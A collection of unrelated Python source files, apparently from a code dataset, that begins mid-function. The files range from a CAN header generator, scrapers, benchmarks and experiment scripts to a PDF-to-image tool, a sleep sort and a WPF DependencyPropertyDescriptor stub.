structs = _generate_structs(database_name, messages)
declarations = _generate_declarations(database_name, messages)
definitions = _generate_definitions(database_name, messages)
header = HEADER_FMT.format(version=__version__,
date=date,
include_guard=include_guard,
frame_id_defines=frame_id_defines,
choices_defines=choices_defines,
structs=structs,
declarations=declarations)
source = SOURCE_FMT.format(version=__version__,
date=date,
header=header_name,
definitions=definitions)
return header, source
|
python
|
from traffic.imports.builtins import SequenceType, sub
def concat(strings: SequenceType[str], separator: str) -> str:
return "".join(s if i == 0 else separator + s for i, s in enumerate(strings))
def to_func_name(name: str):
return sub(r"\W", "_", name).lower()
|
python
|
try:
import urllib.parse as urlparse
except ImportError:
import urlparse
from aws_xray_sdk.core.models import http
from aws_xray_sdk.ext.flask.middleware import XRayMiddleware as OrigMiddleware
from flask import request
__all__ = 'XRayMiddleware',
class XRayMiddleware(OrigMiddleware):
def _before_request(self):
super(XRayMiddleware, self)._before_request()
req = request._get_current_object()
if self.in_lambda_ctx:
segment = self._recorder.current_subsegment()
else:
segment = self._recorder.current_segment()
if req.url_rule:
path = req.url_rule.rule
else:
path = req.path
url = urlparse.urljoin('//{}/'.format(segment.name), path)
segment.put_http_meta(http.URL, str(url))
segment.put_annotation(http.URL, str(req.base_url))
|
python
|
# Exercício Python 069: Crie um programa que leia a idade e o sexo de várias pessoas. A cada pessoa cadastrada,
# o programa deverá perguntar se o usuário quer ou não continuar. No final, mostre:
# A) quantas pessoas tem mais de 18 anos.
# B) quantos homens foram cadastrados.
# C) quantas mulheres tem menos de 20 anos.
total_pessoas = total_homens = mulheres_20 = total_18 = 0
while True:
print('\n', '-='*4, 'Cadastro de Pessoas', '-='*4)
idade = int(input('Idade deste indivíduo: '))
if idade < 0:
while idade < 0:
print('Idade não pode ser menor que 0! ')
idade = int(input('Idade deste indivíduo: '))
sexo = input('Sexo desta pessoa: [M/F] ').strip().upper()[0]
while sexo not in 'MF':
print('Escolha Masculino (M) ou Feminino (F)! ')
sexo = input('Sexo desta pessoa: [M/F] ').strip().upper()[0]
total_pessoas += 1
if sexo == 'M':
total_homens += 1
if sexo == 'F' and idade < 20:
mulheres_20 += 1
if idade > 18:
total_18 += 1
continuar = input('\nDeseja continuar? [S/N] ').strip().upper()[0]
while continuar not in 'SN':
print('\nEscolha uma opção válida! (S ou N)')
continuar = input('Deseja continuar? [S/N] ').strip().upper()[0]
if continuar == 'N':
break
print(f'Cadastro encerrado.\nForam cadastradas {total_18} pessoas maiores de 18 anos, {total_homens} homens e {mulheres_20} mulheres com menos de 20 anos.')
print(f'Total de pessoas: {total_pessoas}')
|
python
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from __future__ import annotations
import typing # noqa F401
import torch
from torch import Tensor
def _flip_sub_unique(x: Tensor, k: int) -> Tensor:
"""Get the first k unique elements of a single-dimensional tensor, traversing the
tensor from the back.
Args:
x: A single-dimensional tensor
k: the number of elements to return
Returns:
A tensor with min(k, |x|) elements.
Example:
>>> x = torch.tensor([1, 6, 4, 3, 6, 3])
>>> y = _flip_sub_unique(x, 3) # tensor([3, 6, 4])
>>> y = _flip_sub_unique(x, 4) # tensor([3, 6, 4, 1])
>>> y = _flip_sub_unique(x, 10) # tensor([3, 6, 4, 1])
NOTE: This should really be done in C++ to speed up the loop. Also, we would like
to make this work for arbitrary batch shapes, I'm sure this can be sped up.
"""
n = len(x)
i = 0
out = set()
idcs = torch.empty(k, dtype=torch.long)
for j, xi in enumerate(x.flip(0).tolist()):
if xi not in out:
out.add(xi)
idcs[i] = n - 1 - j
i += 1
if len(out) >= k:
break
return x[idcs[: len(out)]]
|
python
|
from numpy import *
class Nematic:
def __init__(self, xx=0, xy=0):
self.xx=xx
self.xy=xy
def angle(self):
return 0.5*arctan2(self.xy, self.xx)
def norm(self):
return sqrt(self.xx**2 + self.xy**2)
def __str__(self):
return "Nematic(%g, %g)"%(self.xx, self.xy)
|
python
|
# this file serves as both a test suite and an illustration of how tracing
# responds to various AST node types
import re
from tracelib import macros, kite_trace, get_all_traced_ast_reprs
with kite_trace:
for i in range(5):
print i
print len([1, 2, 3, 1 + 1])
x = {1: 2}
# AugAssign
a = 0
a += 1
# FunctionDef
def foo(): return 'foo!'
foo()
# ClassDef
class A(object):
def a_b(self):
return 1
@staticmethod
def a_c():
return 2
print A().a_b()
print A.a_c()
# Delete
del x[1]
# x[1] = 3
# Print with `dest`
log = open("/tmp/hi", "w")
print >>log, "test"
# For with orelse, Continue
for i in range(3):
continue
else:
print 'orelse'
# While, Break
while True:
break
# If, Pass
if True:
print 'hi'
if False:
pass
else:
print 'hi'
if False:
pass
elif False:
pass
else:
print 'hi'
# With
with open('/tmp/hi') as f:
pass
# TryExcept, Raise
try:
raise ValueError('yo')
except: # no type, no name
pass
try: # type, no name
raise ValueError('')
except ValueError:
pass
try: # type, name
raise ValueError('hi')
except ValueError as e:
pass
try: # orelse
pass
except ValueError as e:
pass
else:
print 'reached'
try:
pass
finally:
print 'finally'
# Assert
assert True
try:
assert False, "hi"
except:
pass
# Import / ImportFrom
import collections
from collections import OrderedDict
from collections import deque as d
import collections as c
# Exec
exec "print a" in {}, {"a": 1}
# Global
foo = 1
global foo
# BoolOp
a = True and True
b = False or True
# BinOp
x = 1 + 2
x = 1 - 2
x = 1 * 2
x = '' * 10
x = 1.5 / 2
x = 2 / 1.5
# UnaryOp
x = 2
x = ~x
# Lambda
x = map(lambda x: x - 2, range(3))
# IfExp
if True:
pass
if False:
pass
else:
pass
if False:
pass
elif False:
pass
else:
pass
# Set
x = set([1, 2, 3])
# ListComp
x = [a for a in range(3) if a < 2]
# SetComp
y = [1, 3]
w = [1, 2, 3]
x = {x + 1 for x in y if True if True for z in w}
# DictComp
x = {k: v for (k, v) in [(1, 2), (3, 4)]}
# GeneratorExp
x = list(x + 1 for x in [1, 2, 3])
# Yield
def foo2():
yield 2, 3
x = [x for x in foo2()]
# Compare
x = x < 4 < 3
x = (x < 4) < 3
# Call
def foo(a, b, c=2):
return a + b + c
print foo(1, 2, 3)
print foo(1, 2)
print foo(1, 2, c=1)
print foo(*(1, 2, 3))
print foo(1, 2, **{'c': 10})
print foo(*(1, 2), **{'c': 10})
# Repr
print repr([1, 10])
# assignment context
class B(object):
def __init__(self): self.a = self.b = 10
x = B()
x.a = 5
x.b = x.a
x = {}
x[1] = 2
x, y = [1, 2]
x, y = (1, 2)
[x, y] = (1, 2)
[x, y] = [1, 2]
# list of differing lengths
for i in []:
print 'hi'
for i in [1]:
print 'hi'
for i in [1, 2]:
print 'hi'
for i in [{1: 2}]:
print 'hi'
print re.compile('.*')
print 'hi'
print 'TARGET CODE 2'
print {1: 2}[1]
y = [1, 2, 3]
z = y[1:]
z = y[:1]
z = y[1:2]
z = y[1:2:1]
print 'hi' * 10
# changing "type" over time
for i in ('string', 1):
print i
# test kite_trace on expressions rather than code blocks
kite_trace[repr([1, 1 + 1, 3])]
kite_trace[str(1)]
kite_trace[[1, 2]]
kite_trace[(2, 3, 1 + 5)]
kite_trace[int("5")]
kite_trace[re.compile('.*')]
kite_trace[{1: 2}[1]]
print '\n\n'.join(get_all_traced_ast_reprs(indent=' ', include_field_names=True))
|
python
|
import numpy as np
import mmap
import os
import glob
import re
class Uio:
"""A simple uio class"""
@staticmethod
def find_device_file(device_name):
device_file = None
r = re.compile("/sys/class/uio/(.*)/name")
for uio_device_name_file in glob.glob("/sys/class/uio/uio*/name"):
f = open(uio_device_name_file, "r")
uio_device_name = f.readline().strip()
if uio_device_name == device_name:
m = r.match(uio_device_name_file)
device_file = m.group(1)
f.close()
return device_file
def __init__(self, name, length=0x1000):
self.name = name
self.device_name = '/dev/%s' % Uio.find_device_file(self.name)
self.device_file = os.open(self.device_name, os.O_RDWR | os.O_SYNC)
self.length = length
self.memmap = mmap.mmap(self.device_file,
self.length,
mmap.MAP_SHARED,
mmap.PROT_READ | mmap.PROT_WRITE,
offset=0)
def irq_on(self):
os.write(self.device_file, bytes([1, 0, 0, 0]))
def irq_off(self):
os.write(self.device_file, bytes([0, 0, 0, 0]))
def wait_irq(self):
os.read(self.device_file, 4)
def regs(self, offset=0, length=None):
if length == None:
length = self.length
if offset+length > self.length:
raise ValueError("region range error")
return Uio.Regs(self.memmap, offset, length)
class Regs:
def __init__(self, memmap, offset, length):
self.memmap = memmap
self.offset = offset
self.length = length
self.word_array = np.frombuffer(self.memmap, np.uint32, self.length>>2, self.offset)
self.byte_array = np.frombuffer(self.memmap, np.uint8 , self.length>>0, self.offset)
def read_word(self, offset):
return int(self.word_array[offset>>2])
def read_byte(self, offset):
return int(self.byte_array[offset>>0])
def write_word(self, offset, data):
self.word_array[offset>>2] = np.uint32(data)
def write_byte(self, offset, data):
self.byte_array[offset>>0] = np.uint8(data)
|
python
|
# Wanderlust Wine - UK
# Tutorial from John Watson Rooney YouTube channel
import requests
from bs4 import BeautifulSoup
from requests.api import head
import pandas as pd
import re
wine_list = []
# Step 1 - Request
def request(x):
url = f'http://www.wanderlustwine.co.uk/buy-wine-online/page/{x}/'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15'}
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
return soup
# Step 2 - Parse
def parse(soup):
products = soup.find_all('li', class_= 'product')
for item in products:
name = item.find('h2', class_= 'woocommerce-loop-product__title').text
price = item.find('span', 'woocommerce-Price-amount amount').text
wine = {
'name': name,
'price': price,
}
wine_list.append(wine)
# Step 3 - Output
def output():
df = pd.DataFrame(wine_list)
print(df.head())
df.to_csv('Wanderlust-Wine.csv')
for x in range(1, 4):
print('Getting page:', x)
html = request(x)
print('Parsing...')
parse(html)
output()
print('Saved items to CSV file.')
|
python
|
import os.path
import tempfile
import maptools
import maptools.external
import pytest
@pytest.mark.skipif(not maptools.external.is_ccp4_available(), reason="requires CCP4")
def test_fit(ideal_map_filename, pdb_filename):
_, output_pdb_filename = tempfile.mkstemp()
_, log_filename = tempfile.mkstemp()
maptools.fit(
input_map_filename=ideal_map_filename,
input_pdb_filename=pdb_filename,
output_pdb_filename=output_pdb_filename,
mode="rigid_body",
resolution=8,
ncycle=2,
log_filename=log_filename,
)
assert os.path.exists(output_pdb_filename)
|
python
|
#!/usr/bin/env python3
from otl866 import at89, util
import unittest
import os
class TestCase(unittest.TestCase):
def setUp(self):
"""Call before every test case."""
print("")
port = util.default_port()
self.verbose = os.getenv("VERBOSE", "N") == "Y"
self.tl = at89.AT89(port, verbose=self.verbose)
self.tl.led(1)
def tearDown(self):
"""Call after every test case."""
self.tl.led(0)
def test_sig(self):
sig = self.tl.sig()
print("Device: %s" % at89.sig_str(sig))
"""
def test_blank(self):
# WARNING: takes a long time, maybe 20 sec
self.tl.blank()
"""
def test_reset_vdd(self):
self.tl.reset_vdd()
def test_read(self):
buff = self.tl.read(0, 16)
assert len(buff) == 16, len(buff)
def test_read_sf(self):
buff = self.tl.read_sf(0, 16)
assert len(buff) == 16, len(buff)
def test_erase(self):
self.tl.erase()
def test_lock(self):
self.tl.lock(2)
#self.tl.lock(3)
#self.tl.lock(4)
if __name__ == "__main__":
unittest.main() # run all tests
|
python
|
##############################################################################
#
# Copyright (c) 2002 Zope Foundation and Contributors.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
from Products.MailHost import MailHost
from Products.MailHost import SendMailTag # noqa
def initialize(context):
context.registerClass(
MailHost.MailHost,
permission='Add MailHost objects',
constructors=(MailHost.manage_addMailHostForm,
MailHost.manage_addMailHost),
icon='www/MailHost_icon.gif',
)
|
python
|
# batch running of experiments
import os
import getpass
import argparse
from utils import *
from runmm2 import Simulation
def CleanState ():
os.system('sudo killall python2 receiver sender mm-link mm-delay >/dev/null 2>&1 ')
# os.system('sudo ../ccp-kernel/ccp_kernel_unload')
# os.system('sudo ../ccp-kernel/ccp_kernel_load ipc=0')
os.system('sudo sysctl -w net.ipv4.ip_forward=1 >/dev/null 2>&1')
os.system('sleep 5')
def RunCCP ():
CleanState ()
os.system('sudo nohup python2 ../ccp_bicdctcp/python/bic_dctcp_centroids.py 10000000 -P exp -A 0.5 >./nohup_vatic.log 2>&1 &')
os.system('sleep 5')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
megroup = parser.add_mutually_exclusive_group()
parser.add_argument('--savedir', help='Directory to store outputs', default='results')
megroup.add_argument('--ttr', '-t', type=positive_int, metavar='DURATION_SEC',
help='Duration to run the experiment (seconds)', default=30)
megroup.add_argument('--n-blocks', '-n', type=positive_int, metavar='NUM_BLOCKS',
help='Number of blocks to send')
megroup.add_argument('--trace-file', '-f', dest='filepath',
help='Trace file from which to generate traffic for sender')
parser.add_argument('--blksize', '-b', type=int,
help='Size of a block (multiples of KiB)',
default=Simulation.BLKSIZE_DEFAULT)
parser.add_argument('--cc-algo', '-C', choices=('cubic', 'reno', 'bbr', 'ccp', 'ledbat', 'verus', 'pcc'), help='CC algo to use',
default='bbr')
# parser.add_argument('--mm-delay', type=unsigned_int,
# help='Delay for mahimahi delay shell (mm-delay)')
parser.add_argument('--log', '-l', action='store_true',
help='Log packets at the sender and receiver',
default=False)
parser.add_argument('--skip-seconds', type=unsigned_int,
help='Skip initial seconds before computing performance (default: 0)',
default=0)
parser.add_argument('--verbose', '-v', action='count',
help='Show verbose output',
default=0)
args = parser.parse_args()
prettyprint_args(args)
port = 9999
# trace_list = ['Building_a_new', 'Building_b_new', 'Building_c_new', 'InHM_a_new', 'InHM_b_new', 'InHM_c_new']
# maxbw_list = [, 1000, 700, 1015, 1015, 1030]# Megabits/sec
trace_list = ['LOW_10-HIGH_100']
maxbw_list = [200]# Megabits/sec
mmdelay_list = [5]
nrep = 1
for trace, maxbw in zip(trace_list, maxbw_list):
#trace += '_new'
print(os.linesep + '**** Trace: {}, Max BW: {} Mbps ****'.format(trace, maxbw) + os.linesep)
# exit(-1)
for delay in mmdelay_list:
bdp = (maxbw * delay) * (1e3 / 8)
bdpfactor_list = [None] #[None,1,2,4]
for bdpfactor in bdpfactor_list:
if bdpfactor is None:
qsize=None
print('#### mm-delay DELAY = {} ms, buffer size = Infinite ####'.format(delay) + os.linesep)
else:
qsize = bdpfactor * bdp
qsize_nice, unit_nice = get_bytes_nice(qsize, kibi=False)
print('#### mm-delay DELAY = {} ms, buffer size = {}*BDP = {} {} ####'.format(delay, bdpfactor, qsize_nice, unit_nice) + os.linesep)
sim = Simulation(trace, port, args.ttr, args.n_blocks, args.filepath, args.blksize, args.cc_algo, qsize, delay)
for i in range(1, nrep+1):
#sim.run(root_passwd, args.savedir, args.log, args.skip_seconds, args.verbose, suffix=str(i))
try:
RunCCP ()
# print ('Running !!!')
# sim.run(args.savedir+"_{:02d}".format(i), args.log, args.skip_seconds, args.verbose)
sim.run(args.savedir, args.log, args.skip_seconds, args.verbose)
except:
print('Something failed in scenario {}... continue'.format(trace))
#okPlease wait for 5 mins
|
python
|
from file_utilities import readCSVFile
from PlotterLine import PlotterLine
solution = readCSVFile("output.csv")
a_liq_plotter = PlotterLine("Position", "Volume Fraction")
a_liq_plotter.addSet(solution["x"], solution["a_liq"], "$\\alpha_\ell$", color=4, linetype=2)
a_liq_plotter.save("volume_fraction.png")
r_liq_plotter = PlotterLine("Position", "Density [kg/m$^3$]")
r_liq_plotter.addSet(solution["x"], solution["r_liq"], "$\\rho_\ell$", color=4, linetype=2)
r_liq_plotter.save("density_liquid.png")
r_vap_plotter = PlotterLine("Position", "Density [kg/m$^3$]")
r_vap_plotter.addSet(solution["x"], solution["r_vap"], "$\\rho_v$", color=1, linetype=2)
r_vap_plotter.save("density_vapor.png")
u_liq_plotter = PlotterLine("Position", "Velocity [m/s]")
u_liq_plotter.addSet(solution["x"], solution["u_liq"], "$u_\ell$", color=4, linetype=2)
u_liq_plotter.save("velocity_liquid.png")
u_vap_plotter = PlotterLine("Position", "Velocity [m/s]")
u_vap_plotter.addSet(solution["x"], solution["u_vap"], "$u_v$", color=1, linetype=2)
u_vap_plotter.save("velocity_vapor.png")
p_liq_plotter = PlotterLine("Position", "Pressure [m/s]")
p_liq_plotter.addSet(solution["x"], solution["p_liq"], "$p_\ell$", color=4, linetype=2)
p_liq_plotter.save("pressure_liquid.png")
p_vap_plotter = PlotterLine("Position", "Pressure [m/s]")
p_vap_plotter.addSet(solution["x"], solution["p_vap"], "$p_v$", color=1, linetype=2)
p_vap_plotter.save("pressure_vapor.png")
|
python
|
"""
Benchmarks for array expressions.
"""
import numpy as np
# @jit(nopython=True)
def sum(a, b):
return a + b
# @jit(nopython=True)
def sq_diff(a, b):
return (a - b) * (a + b)
# @jit(nopython=True)
def rel_diff(a, b):
return (a - b) / (a + b)
# @jit(nopython=True)
def square(a, b):
# Note this is currently slower than `a ** 2 + b`, due to how LLVM
# seems to lower the power intrinsic. It's still faster than the naive
# lowering as `exp(2 * log(a))`, though
return a ** 2
# @jit(nopython=True)
def cube(a, b):
return a ** 3
def setup():
ArrayExpressions.setupClass()
class ArrayExpressions:
n = 100000
dtypes = ('float32', 'float64')
@classmethod
def setupClass(cls):
cls.samples = {}
random = np.random.RandomState(0)
for dtype in cls.dtypes:
arrays = [random.uniform(1.0, 2.0, size=cls.n).astype(dtype)
for i in range(2)]
cls.samples[dtype] = arrays
@classmethod
def _binary_func(cls, func, dtype, fname):
def f(self):
f = getattr(self, func)
f(*self.samples[dtype])
f.__name__ = fname
return f
@classmethod
def generate_benchmarks(cls):
for dtype in cls.dtypes:
for func in (sum, sq_diff, rel_diff, square, cube):
fname = 'time_%s_%s' % (func.__name__, dtype)
bench_func = cls._binary_func(func.__name__, dtype, fname)
setattr(cls, fname, bench_func)
def setup(self):
from numba import jit
jitter = jit(nopython=True)
self.sum = jitter(sum)
self.sq_diff = jitter(sq_diff)
self.rel_diff = jitter(rel_diff)
self.square = jitter(square)
self.cube = jitter(cube)
ArrayExpressions.generate_benchmarks()
|
python
|
"""
Example usages:
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 4 -o .
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 4-9 -o tmp
python py/pdf_to_img.py -f data/test_pdfs/00026_04_fda-K071597_test_data.pdf -p 1,2,4-9 -o tmp
Pages can be specified 1,2,3 and/or 10-20. The out directory must exist
beforehand (e.g. mkdir tmp)
Note that, for page input, pages start with 1 (not zero)
"""
import argparse
import fitz
def get_pagelist(pages: str):
""" Pages is a string that could equal:
"1,2,3"
"3-4",
"14-4" (invalid),
"1,5-10,14"
"""
segments = pages.split(',')
pagelist = []
for s in segments:
try:
pagelist.append(int(s))
except ValueError:
if '-' in s:
lo, hi = [int(v) for v in s.split('-')]
assert hi > lo, f'Invalid page range {lo}-{hi}'
for p in range(lo, hi+1):
pagelist.append(p)
else:
raise 'pages input not valid'
return sorted(pagelist)
def main(filename: str, pages: str, outpath: str):
doc = fitz.open(filename)
pagelist = get_pagelist(pages)
for p in pagelist:
pix = doc.get_page_pixmap(p-1)
pix.save(f'{outpath}/{p}.png')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'-f',
'--filename',
help='PDF filename to create thumbnails of',
required=True,
)
parser.add_argument(
'-p',
'--pages',
help='Pages to create thumbnails of (e.g. "1,2,3" or "3,5-10")',
required=True,
)
parser.add_argument(
'-o',
'--outpath',
help='path where to save resulting images',
required=True,
)
args = parser.parse_args()
main(filename=args.filename, pages=args.pages, outpath=args.outpath)
|
python
|
import util
import os
def run():
util.process_usgs_source(
base_path=os.path.realpath(__file__),
url="http://pubs.usgs.gov/of/1998/of98-354/sfs_data.tar.gz",
uncompress_e00=True,
e00_path="sfs-geol.e00",
srs="+proj=lcc +lat_1=37.066667 +lat_2=38.433333 +lat_0=36.5 "
"+lon_0=-120.5 +x_0=609601.21920 +y_0=-6 +datum=NAD27 +units=m "
"+no_defs",
metadata_csv_path=os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"units.csv"
)
)
|
python
|
class SleepSort(object):
"""
Sorting list of positive numbers using multi-threading
wherein thread will sleep for integer value and
add integer in result collection.
These multi-threads will add integers of input list
in such way that, result contains collection of sorted integers.
eg: [3, 1, 5, 4, 2]
for each integer, a new thread will be spawned
and wait for the same value
and then, add into result collection
in such way that result is sorted integers.
output: [1, 2, 3, 4, 5]
"""
def __init__(self, arr):
import time
self.inp_arr = arr
self.res = []
self.time = time
self.process()
def __repr__(self):
return ", ".join(map(str, self.res))
def add_ele_in_res(self, val):
"""
Method for adding value to result list
after delay of input value.
"""
self.time.sleep(val)
self.res.append(val)
def process(self):
"""
Sorting based on threading each value of input list.
Logic is based on partition algo of quick sort.
"""
from threading import Thread
pivot_ele = self.inp_arr[0]
part1_arr = []
part2_arr = []
for ele in self.inp_arr:
if ele < pivot_ele:
part1_arr.append(ele)
elif ele > pivot_ele:
part2_arr.append(ele)
threads = []
for ele in part1_arr:
th = Thread(target=self.add_ele_in_res, args=(ele,))
threads.append(th)
th.start()
th = Thread(target=self.add_ele_in_res, args=(pivot_ele,))
threads.append(th)
th.start()
for ele in part2_arr:
th = Thread(target=self.add_ele_in_res, args=(ele,))
threads.append(th)
th.start()
for th in threads:
th.join()
print(SleepSort([3, 1, 5, 4, 2]))
print(SleepSort([5, 4, 3, 2, 1]))
print(SleepSort([1, 2, 3, 4, 5]))
print(SleepSort([4, 5, 1, 2, 3]))
print(SleepSort([3, 4, 5, 1, 2]))
|
python
|
"""
A precondition for the algorithm working is that the library 'requests'
must be installed on the device prior to using the program
"""
import requests
def auto_reconnect():
"""
Auto reconnect to password module
The ClientURL (cURL) command converted over to python for compatibility
with all platforms
The program initiates by accepting the cookies provided on the webpage
The code opens the provided link and accepts the terms and conditions
button
"""
cookies = {
'_ga': 'GA1.2.490792435.1536769170',
}
headers = {
'Host': 'conditions.bruyere.org',
'User-Agent': 'Safari/5.0 (X11; Linux i686 on x86_64; rv:52.0) Gecko/20100101 Safari/52.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Referer': 'https://conditions.bruyere.org/fs/customwebauth/login.html?switch_url=https://conditions.bruyere.org/login.html&wlan=GuestWifi&statusCode=1',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
data = {
'buttonClicked': '4',
'redirect_url': '',
'err_flag': '0'
}
response = requests.post('https://conditions.bruyere.org/login.html', headers=headers, cookies=cookies, data=data)
print("Terms and Conditions : Accepted automatically without user interference")
#### Once the terms and conditions are accepted the algorithm prints the confirmation statement ####
if __name__ == '__main__':
auto_reconnect()
|
python
|
class DependencyPropertyDescriptor(PropertyDescriptor):
""" Provides an extension of System.ComponentModel.PropertyDescriptor that accounts for the additional property characteristics of a dependency property. """
def AddValueChanged(self,component,handler):
"""
AddValueChanged(self: DependencyPropertyDescriptor,component: object,handler: EventHandler)
Enables other objects to be notified when this property changes.
component: The component to add the handler for.
handler: The delegate to add as a listener.
"""
pass
def CanResetValue(self,component):
"""
CanResetValue(self: DependencyPropertyDescriptor,component: object) -> bool
Returns whether resetting an object changes its value.
component: The component to test for reset capability.
Returns: true if resetting the component changes its value; otherwise,false.
"""
pass
def Equals(self,obj):
"""
Equals(self: DependencyPropertyDescriptor,obj: object) -> bool
Compares two System.ComponentModel.DependencyPropertyDescriptor instances for
equality.
obj: The System.ComponentModel.DependencyPropertyDescriptor to compare with the
current instance.
Returns: true if the values are equivalent; otherwise,false.
"""
pass
@staticmethod
def FromName(name,ownerType,targetType,ignorePropertyType=None):
"""
FromName(name: str,ownerType: Type,targetType: Type,ignorePropertyType: bool) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
property name.
name: The registered name of a dependency property or an attached property.
ownerType: The System.Type of the object that owns the property definition.
targetType: The System.Type of the object you want to set the property for.
ignorePropertyType: Specifies to ignore the property type.
Returns: The requested System.ComponentModel.DependencyPropertyDescriptor.
FromName(name: str,ownerType: Type,targetType: Type) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
property name.
name: The registered name of a dependency property or an attached property.
ownerType: The System.Type of the object that owns the property definition.
targetType: The System.Type of the object you want to set the property for.
Returns: The requested System.ComponentModel.DependencyPropertyDescriptor.
"""
pass
@staticmethod
def FromProperty(*__args):
"""
FromProperty(dependencyProperty: DependencyProperty,targetType: Type) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
dependency property and target type.
dependencyProperty: The identifier for a dependency property.
targetType: The type of the object where the property is set.
Returns: A System.ComponentModel.DependencyPropertyDescriptor for the provided
dependency property.
FromProperty(property: PropertyDescriptor) -> DependencyPropertyDescriptor
Returns a System.ComponentModel.DependencyPropertyDescriptor for a provided
System.ComponentModel.PropertyDescriptor.
property: The System.ComponentModel.PropertyDescriptor to check.
Returns: If the property described by property is a dependency property,returns a valid
System.ComponentModel.DependencyPropertyDescriptor. Otherwise,returns a
nullSystem.ComponentModel.DependencyPropertyDescriptor.
"""
pass
def GetChildProperties(self,*__args):
"""
GetChildProperties(self: DependencyPropertyDescriptor,instance: object,filter: Array[Attribute]) -> PropertyDescriptorCollection
Returns a System.ComponentModel.PropertyDescriptorCollection.
instance: A component to get the properties for.
filter: An array of type System.Attribute to use as a filter.
Returns: A System.ComponentModel.PropertyDescriptorCollection with the properties that
match the specified attributes for the specified component.
"""
pass
def GetEditor(self,editorBaseType):
"""
GetEditor(self: DependencyPropertyDescriptor,editorBaseType: Type) -> object
Gets an editor of the specified type.
editorBaseType: The base type of editor,which is used to differentiate between multiple
editors that a property supports.
Returns: An instance of the requested editor type,or null if an editor cannot be found.
"""
pass
def GetHashCode(self):
"""
GetHashCode(self: DependencyPropertyDescriptor) -> int
Returns the hash code for this
System.ComponentModel.DependencyPropertyDescriptor.
Returns: A 32-bit signed integer hash code.
"""
pass
def GetValue(self,component):
"""
GetValue(self: DependencyPropertyDescriptor,component: object) -> object
Resturns the current value of the property on a component.
component: The component instance.
Returns: The requested value.
"""
pass
def RemoveValueChanged(self,component,handler):
"""
RemoveValueChanged(self: DependencyPropertyDescriptor,component: object,handler: EventHandler)
Enables other objects to be notified when this property changes.
component: The component to add the handler for.
handler: The delegate to add as a listener.
"""
pass
def ResetValue(self,component):
"""
ResetValue(self: DependencyPropertyDescriptor,component: object)
Resets the value for this property of the component to the default value.
component: The component with the property value that is to be reset to the default value.
"""
pass
def SetValue(self,component,value):
"""
SetValue(self: DependencyPropertyDescriptor,component: object,value: object)
Sets the value of the component to a different value.
component: The component with the property value that is to be set.
value: The new value.
"""
pass
def ShouldSerializeValue(self,component):
"""
ShouldSerializeValue(self: DependencyPropertyDescriptor,component: object) -> bool
Indicates whether the value of this property needs to be persisted by
serialization processes.
component: The component with the property to be examined for persistence.
Returns: true if the property should be persisted; otherwise,false.
"""
pass
def ToString(self):
"""
ToString(self: DependencyPropertyDescriptor) -> str
Converts the value of this instance to its equivalent string representation.
Returns: Returns the System.ComponentModel.MemberDescriptor.Name value.
"""
pass
AttributeArray=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets an array of attributes.
"""
Attributes=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the collection of attributes for this member.
Get: Attributes(self: DependencyPropertyDescriptor) -> AttributeCollection
"""
Category=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name of the category that the member belongs to,as specified in the System.ComponentModel.CategoryAttribute.
Get: Category(self: DependencyPropertyDescriptor) -> str
"""
ComponentType=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the type of the component this property is bound to.
Get: ComponentType(self: DependencyPropertyDescriptor) -> Type
"""
Converter=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the type converter for this property.
Get: Converter(self: DependencyPropertyDescriptor) -> TypeConverter
"""
DependencyProperty=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Returns the dependency property identifier.
Get: DependencyProperty(self: DependencyPropertyDescriptor) -> DependencyProperty
"""
Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the description of the member,as specified in the System.ComponentModel.DescriptionAttribute.
Get: Description(self: DependencyPropertyDescriptor) -> str
"""
DesignerCoerceValueCallback=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets or sets a callback that designers use to modify the effective value of a dependency property before the dependency property value is stored in the dependency property engine.
Get: DesignerCoerceValueCallback(self: DependencyPropertyDescriptor) -> CoerceValueCallback
Set: DesignerCoerceValueCallback(self: DependencyPropertyDescriptor)=value
"""
DesignTimeOnly=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets whether this member should be set only at design time,as specified in the System.ComponentModel.DesignOnlyAttribute.
Get: DesignTimeOnly(self: DependencyPropertyDescriptor) -> bool
"""
DisplayName=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets the name that can be displayed in a window,such as a Properties window.
Get: DisplayName(self: DependencyPropertyDescriptor) -> str
"""
IsAttached=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""Gets a value that indicates whether the property is registered as an attached property and is being used through an attached usage.
Get: IsAttached(self: DependencyPropertyDescriptor) -> bool
"""
